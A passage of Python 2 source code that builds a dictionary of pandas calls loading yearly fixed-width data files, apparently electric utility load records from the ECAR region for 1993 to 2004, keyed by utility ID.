1996 : pd.read_fwf('%s/ecar/1996/CEI96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
3542 : {
1993 : pd.read_fwf('%s/ecar/1993/CEI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CEI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CEI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CIN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/CIN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/CIN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/CIN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/CIN00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/CIN01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/CIN02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/CIN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/CIN04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4254 : {
1993 : pd.read_fwf('%s/ecar/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/CP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/CP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4922 : {
1993 : pd.read_fwf('%s/ecar/1993/DPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5109 : {
1993 : pd.read_fwf('%s/ecar/1993/DECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DECO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DECO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DECO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DECO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DECO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DECO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DECO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DECO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5487 : {
1993 : pd.read_fwf('%s/ecar/1993/DLCO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/DLCO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/DLCO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/DLCO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/DLCO97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/DLCO98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/DLCO99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/DLCO00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/DLCO01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/DLCO02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/DLCO03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/DLCO04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
5580 : {
1993 : pd.read_fwf('%s/ecar/1993/EKPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/EKPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/EKPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/EKPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/EKPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/EKPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/EKPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/EKPC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/EKPC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/EKPC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/EKPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/EKPC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9267 : {
1993 : pd.read_fwf('%s/ecar/1993/HEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/HEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/HEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/HEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/HEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/HEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/HEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/HEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/HEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/HEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/HEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/HEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9273 : {
1993 : pd.read_fwf('%s/ecar/1993/IPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/IPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/IPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/IPL96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/IPL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/IPL98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/IPL99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/IPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/IPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/IPL02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/IPL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/IPL04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
10171 : {
1993 : pd.read_fwf('%s/ecar/1993/KUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/KUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/KUC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/KUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/KUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
11249 : {
1993 : pd.read_fwf('%s/ecar/1993/LGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/LGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/LGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/LGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/LGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/LGEE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/LGEE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/LGEE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/LGEE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/LGEE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/LGEE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/LGEE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13756 : {
1993 : pd.read_fwf('%s/ecar/1993/NIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/NIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/NIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/NIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/NIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/NIPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/NIPS99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/NIPS00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/NIPS01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/NIPS02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/NIPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/NIPS04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13998 : {
1993 : pd.read_fwf('%s/ecar/1993/OES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OES95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14015 : {
1993 : pd.read_fwf('%s/ecar/1993/OVEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OVEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OVEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OVEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
